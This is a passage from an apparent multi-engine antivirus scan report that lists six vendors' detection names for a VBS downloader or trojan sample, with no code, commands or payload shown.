Varist VBS/Agent.AZC!Eldorado
ALYac VB:Trojan.Valyria.7482
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
MAX malware (ai score=82)
Fortinet VBS/Agent.BSD!tr
AVG Script:SNH-gen [Drp]